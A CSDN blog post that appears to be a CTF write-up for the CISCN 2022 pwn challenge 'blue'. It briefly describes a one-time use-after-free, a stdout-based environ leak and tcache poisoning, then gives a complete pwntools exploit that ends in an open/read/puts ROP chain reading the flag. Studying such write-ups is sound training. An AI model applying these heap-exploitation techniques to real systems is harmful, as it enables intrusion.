CISCN 2022 华东北 blue

于 2024-04-05 16:57:27 发布
阅读量211 收藏
点赞数 2
分类专栏: pwn 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60209620/article/details/137403855
版权
文章描述了一种利用UAF(UseAfterFree)漏洞的攻击方法,通过控制内存分配和释放,实现栈溢出、堆块overlapping,并利用沙箱环境下的漏洞,最终获取libc地址,构造shellcode实现远程代码执行。
摘要由CSDN通过智能技术生成

题目地址
提取码: Ya0o

漏洞

  • uaf,只能一次
  • show函数只能用一次,所以可以打_IO_2_1_stdout_结构体,泄露environ中内容,用来计算栈偏移
  • 堆块overlapping
  • 开启了沙箱,控制add函数的ret地址,与栈结合使用orw

exp

from pwn import *
from pwn import p64,u64,p32,u32,p8

context.terminal = ["tmux","sp","-h"]
context(log_level="debug",os="linux",arch="amd64")

io=remote('node4.anna.nssctf.cn',28332)
# io = process("./pwn")

elf=ELF("./pwn")
libc=ELF('/ctf/tools/libc.so.6')

sla = lambda x,y : io.sendlineafter(x,y)
sa  = lambda x,y : io.sendafter(x,y)
sl  = lambda x   : io.sendline(x)
sd  = lambda x   : io.send(x)
gd  = lambda     : gdb.attach(io)
inter = lambda   : io.interactive()

def get_addr() :
    return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))


def add(size,content):
    sla(b"Choice: ",b"1")
    sla(b"Please input size:",str(size))
    sa(b"Please input content:",content)

def free(idx):
    sla(b"Choice: ",b"2")
    sla(b"Please input idx:",str(idx))

def show(idx):
    sla(b"Choice: ",b"3")
    sla(b"Please input idx:",str(idx))

def uaf(idx):
    sla(b"Choice: ",b"666")
    sla(b"Please input idx:",str(idx))

def pwn():
    for i in range(9):
        add(0x80,b"aaaa") # 0-8
    add(0x10,b"aaaa")
    for i in range(7):
        free(i)
    uaf(8)    
    show(8)
    libc_base = get_addr() - 0x1ecbe0
    IO_stdout = libc_base + libc.sym["_IO_2_1_stdout_"]
    environ = libc_base + libc.sym["environ"]
    print("libc_base ------> "+hex(libc_base))    
    free(7)
    add(0x80,b"aaaa") #0
    free(8)
    # gd()
    # pause()
    add(0x70,b"aaaa") #1
    payload = p64(0) + p64(0x91)
    payload += p64(IO_stdout)
    add(0x70,payload) #2
    add(0x80,b"aaaa") #3  2和3地址只差了0x10,所以用2可以覆盖3堆块,控制tcache链表
    payload = p64(0xfbad1800) + p64(0) * 3
    payload += p64(environ) + p64(environ + 8)*2
    add(0x80,payload) #4
    stack = get_addr() - 0x128
    print("stack addr ----> "+hex(stack))
    # pause()

    free(3)
    # pause()
    free(2)
    # pause()

    payload = p64(0) + p64(0x91)
    payload += p64(stack)
    add(0x70,payload)
    add(0x80,b"aaaa") # 将下一个控制位add函数的ret栈地址,方便我们写入shellcode
    # pause()
    pop_rdi = 0x0000000000023b6a + libc_base
    pop_rsi = 0x000000000002601f + libc_base
    pop_rdx = 0x0000000000142c92 + libc_base
    open_plt = libc_base + libc.sym["open"]
    read_plt = libc_base + libc.sym["read"]
    puts_plt = libc_base + libc.sym["puts"]
    flag = stack + 0x180 # flag被读入的地址
  
    # ./flag字符串地址就是stack地址,注意要8字节对齐
    payload = b"./flag\x00\x00"
    # open("./flag",0) 0 代表只读形式
    payload += p64(pop_rdi) + p64(stack)
    payload += p64(pop_rsi) + p64(0)
    payload += p64(open_plt)
    # read(3,flag地址,0x40)
    payload += p64(pop_rdi) + p64(3)
    payload += p64(pop_rsi) + p64(flag)
    payload += p64(pop_rdx) + p64(0x40)
    payload += p64(read_plt)

    # puts(flag地址) 因为写orw的话,payload会超过了0x80字节
    payload += p64(pop_rdi) + p64(flag)
    payload += p64(puts_plt)

    add(0x80,payload) # 这个堆块可以就是add函数的ret地址,我们将payload写在那里
    # pause()

    inter()

pwn()
Ya0_
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
20位大佬,勾勒出一个中国网络安全江湖
xueshenlaila的博客
06-28 4399
文章目录一、为大家介绍20位大佬?一 西安:西交大、西电、西工大360 集团董事长兼 CEO:周鸿祎赛博英杰 CEO:谭晓生腾讯副总裁:丁珂阿里云:吴翰清知道创宇 CTO&COO:杨冀龙二 合肥:中科大、安医大深信服 CEO:何朝曦360 首席科学家:潘剑锋腾讯安全:TK 教主云深互联 CEO:陈本峰三 哈尔滨:哈工大、哈工程安天集团:肖新光360 集团首席安全官:杜跃进安芯网盾 CEO、CTO:姜向前、姚纪卫四 上海:复旦、同济、上海交大腾讯安全:吴石启明星辰集团 CEO:严望佳同济:季昕华五 .
人工智能与大数据时代-2019
热门推荐
anchker的博客
02-01 3万+
文章不断更新中..... 20191013 白皮书丨大数据产业发展呈现八大趋势 《2019中国大数据产业发展白皮书》深度解读之一 《2019中国大数据产业发展白皮书》深度解读之二 《2019中国大数据产业发展白皮书》深度解读之三 《2019中国大数据产业发展白皮书》深度解读之四 《2019中国大数据产业发展白皮书》深度解读之五 德勤&第四范式联合发布企业智能化转型白皮书 ...
2023 ciscn 华东分区赛 pwn cgi
z1r0的博客
07-10 470
模拟了一个http协议的交互。
CISCN 2023 华中分区赛 awd pwn——tsh
CoLin的pwn小屋
07-10 1960
CISCN 2023 awd pwn 分析
ciscn 2022 华东分区赛pwn blue
z1r0的博客
07-02 773
开了沙盒 最简单的解法还是借助environ来控制ret地址,然后将ret改成orw链即可。这一题的关键点在于怎么泄露出environ里面的栈地址,因为show功能只能使用一次。 这一题的漏洞点是一次性的uaf漏洞,在666功能下 我们首先先借助这一次性的uaf泄露出libc。还是填满tcache,只不过下一个进unsorted bin的时候利用666这个uaf功能。 接下来思考一下如何泄露出environ里面的值,show是一次性的已经用不了。仔细思考一下不难想出利用stdout来泄露,将flags
ciscn 2022 华东分区赛pwn bigduck
z1r0的博客
07-01 714
这个是2.33下的,2.33下有free_hook 和 malloc_hook。这题开启了沙盒,禁用了execve 所以考虑orw攻击方法。这里有一个小坑点,2.33下通过unsorted bin泄露的时候,main_arena那里的低字节是\x00,所以直接show的话会show不出来。在show前利用edit将低字节改为\x01即可。最后算libc的时候 - 1即可。两种攻击思路,第一种借助environ泄露出stack然后改edit的ret为orw即可,第二种劫持hook为万能gadget(直接拿2
ciscn-2022 东赛区分区赛 RE-hana
qq_34010404的博客
07-20 517
逆向太菜了,当时没逆出来,今天复现一下,虽然出了,但是是下断点断出来的…
IaaS生态系统扫描
weixin_34388207的博客
06-03 124
IaaS服务是近两年才兴起的,整个市场还处于培育期。无论是IaaS解决方案供应商、IaaS服务商,还是用户,都需要一个转变的过程。对于IaaS解决方案供应商来说,最大的转变就是以前只是单纯地销售产品,现在却要卖服务。厂商原有的研发、生产、销售和服务理念都要转变。对于IaaS服务商来说,最大的挑战来自于如何实现差异化的服务,并且能够在尽可能短的时间内实现收入平衡,从而步入良性发展的轨道。面对不同的解...
电子或通讯领域当前的主流技术及其社会需求调查报告
BGD150809309的博客
12-11 3820
互联网(1)未来将是一个网络无处不在的世界,任何东西都可以进行网络互联,我们可以在我们能够达到的任何地方对我们想要了解的任何东西进行搜索和远程控制。这是一个总体的宏伟设想。 未来网络通信的带宽将会是我们现在想象不到的,未来上网应该是不受时间、带宽等限制的。我们可以随心所欲,但不能为所欲为,那时候的控制机制应该更合理,更强大。反正就是以我们现在的思维无法想象的到的。举个简单的例子:就像几十年前计算机
如何做职业规划并进行求职准备(持续更新)
08-03 2万+
读《这些道理没有人告诉过你》的职业规划思考 1.根据初步判断,我最适合的职位应该是软件测试工程师 2.根据初步判断,我最适合的行业应该是软件测试行业?互联网行业?互联网金融行业?电商行业?(不太清楚行业的分类,暂时先这么写吧) 3.根据职位与行业,我选定的目标公司应该是: 最高目标公司三家:阿里巴巴集团 、天猫 、京东 (亚马逊、沃尔玛百货公司、 苏宁云商集团股份有...
下载思科模拟器Cisco packet Tracer 8.2.2
05-28
Cisco packet Tracer 8.2.2用于思科实验,练习使用。非常方便。
思科cisco实验内容练习.zip
09-25
思科模拟器各种设备练习,包含1.交换机的基本配置2.连接有线和无线配置3.第 3 层交换机4.路由器基本配置及排除i 5.pv4和ipv6编址6.子网划分7.服务器8.无线路由器9.扩展练习-.端口安全
2022思科网络计算机网络双语教程第八章精选ppt.ppt
11-14
2022思科网络计算机网络双语教程第八章精选ppt.ppt
思科视觉网络指数:预测与趋势 2017-2022
07-24
思科视觉网络指数:预测与趋势 2017-2022 This forecast is part of the Cisco® Visual Networking Index™ (Cisco VNI™), an ongoing initiative to track and forecast the impact of visual networking ...
思科仿真模拟器cisco packet tracer6.2
03-07
cisco packet tracer 6.2是由思科推出的一款仿真模拟器,主要用于思科各类设备的模拟学习操作,包括交换机、路由器的模拟,旨在帮助初学者进行各类网络的设计、配置、排除网络故障等,用户还可以在软件的图形用户...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8324
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
OpenHarmony移植小型系统EXYNOS4412 linux内核build配置
07-07
OpenHarmony移植小型系统EXYNOS4412 linux内核build相关的配置
ROS安装配置与语法simulation-robot.launch
最新发布
07-08
ROS安装配置与语法simulation_robot.launch
Java软件开发实战 Java基础与案例开发详解 14-1 图形用户界面设计 共15页.pdf
07-07
完整版:https://download.csdn.net/download/qq_27595745/89522468 【课程大纲】 1-1 什么是java 1-2 认识java语言 1-3 java平台的体系结构 1-4 java SE环境安装和配置 2-1 java程序简介 2-2 计算机中的程序 2-3 java程序 2-4 java类库组织结构和文档 2-5 java虚拟机简介 2-6 java的垃圾回收器 2-7 java上机练习 3-1 java语言基础入门 3-2 数据的分类 3-3 标识符、关键字和常量 3-4 运算符 3-5 表达式 3-6 顺序结构和选择结构 3-7 循环语句 3-8 跳转语句 3-9 MyEclipse工具介绍 3-10 java基础知识章节练习 4-1 一维数组 4-2 数组应用 4-3 多维数组 4-4 排序算法 4-5 增强for循环 4-6 数组和排序算法章节练习 5-0 抽象和封装 5-1 面向过程的设计思想 5-2 面向对象的设计思想 5-3 抽象 5-4 封装 5-5 属性 5-6 方法的定义 5-7 this关键字 5-8 javaBean 5-9 包 package 5-10 抽象和封装章节练习 6-0 继承和多态 6-1 继承 6-2 object类 6-3 多态 6-4 访问修饰符 6-5 static修饰符 6-6 final修饰符 6-7 abstract修饰符 6-8 接口 6-9 继承和多态 章节练习 7-1 面向对象的分析与设计简介 7-2 对象模型建立 7-3 类之间的关系 7-4 软件的可维护与复用设计原则 7-5 面向对象的设计与分析 章节练习 8-1 内部类与包装器 8-2 对象包装器 8-3 装箱和拆箱 8-4 练习题 9-1 常用类介绍 9-2 StringBuffer和String Builder类 9-3 Rintime类的使用 9-4 日期类简介 9-5 java程序国际化的实现 9-6 Random类和Math类 9-7 枚举 9-8 练习题 10-1 java异常处理 10-2 认识异常 10-3 使用try和catch捕获异常 10-4 使用throw和throws引发异常 10-5 finally关键字 10-6 getMessage和printStackTrace方法 10-7 异常分类 10-8 自定义异常类 10-9 练习题 11-1 Java集合框架和泛型机制 11-2 Collection接口 11-3 Set接口实现类 11-4 List接口实现类 11-5 Map接口 11-6 Collections类 11-7 泛型概述 11-8 练习题 12-1 多线程 12-2 线程的生命周期 12-3 线程的调度和优先级 12-4 线程的同步 12-5 集合类的同步问题 12-6 用Timer类调度任务 12-7 练习题 13-1 Java IO 13-2 Java IO原理 13-3 流类的结构 13-4 文件流 13-5 缓冲流 13-6 转换流 13-7 数据流 13-8 打印流 13-9 对象流 13-10 随机存取文件流 13-11 zip文件流 13-12 练习题 14-1 图形用户界面设计 14-2 事件处理机制 14-3 AWT常用组件 14-4 swing简介 14-5 可视化开发swing组件 14-6 声音的播放和处理 14-7 2D图形的绘制 14-8 练习题 15-1 反射 15-2 使用Java反射机制 15-3 反射与动态代理 15-4 练习题 16-1 Java标注 16-2 JDK内置的基本标注类型 16-3 自定义标注类型 16-4 对标注进行标注 16-5 利用反射获取标注信息 16-6 练习题 17-1 顶目实战1-单机版五子棋游戏 17-2 总体设计 17-3 代码实现 17-4 程序的运行与发布 17-5 手动生成可执行JAR文件 17-6 练习题 18-1 Java数据库编程 18-2 JDBC类和接口 18-3 JDBC操作SQL 18-4 JDBC基本示例 18-5 JDBC应用示例 18-6 练习题 19-1 。。。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值